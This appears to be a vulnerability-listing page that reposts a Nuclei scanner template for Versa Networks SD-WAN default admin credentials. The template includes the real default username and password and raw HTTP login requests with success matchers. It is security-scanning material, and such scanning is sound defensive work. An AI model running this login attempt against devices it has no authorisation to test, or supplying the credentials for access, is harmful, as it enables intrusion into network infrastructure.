versa-default-login: Versa Networks SD-WAN Application Default Login

日期: 2025-08-01 | 影响软件: Versa Networks SD-WAN Application | POC: 已公开

漏洞描述

Versa Networks SD-WAN application default admin credentials were discovered.

PoC代码[已公开]

id: versa-default-login

info:
  name: Versa Networks SD-WAN Application Default Login
  author: davidmckennirey
  severity: high
  description: Versa Networks SD-WAN application default admin credentials were discovered.
  reference:
    - https://versa-networks.com/products/sd-wan.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 2
  tags: default-login,versa,sdwan,vuln

http:
  - raw:
      - |
        GET /versa/login.html HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
      - |
        POST /versa/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password={{pass}}&sso=systemRadio

    attack: pitchfork
    payloads:
      user:
        - Administrator
      pass:
        - versa123

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 302'
          - "contains(tolower(header_2), 'jsessionid')"
          - "contains(tolower(header_2), 'location: /versa/index.html')"
        condition: and

      - type: dsl
        dsl:
          - "contains(tolower(header_2), '/login?error=true')"
          - "contains(tolower(header_2), '/login?tokenmissingerror=true')"
        negative: true
# digest: 4a0a0047304502210083cb49b99922f75f03d03772e225551bf1e102dfcafefa8f75a91478956e7249022000ba66eece4bd1650a1593d532c6efb7da299914c2d0ae268174068b23be7986:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/versa/versa-default-login.yaml

相关漏洞推荐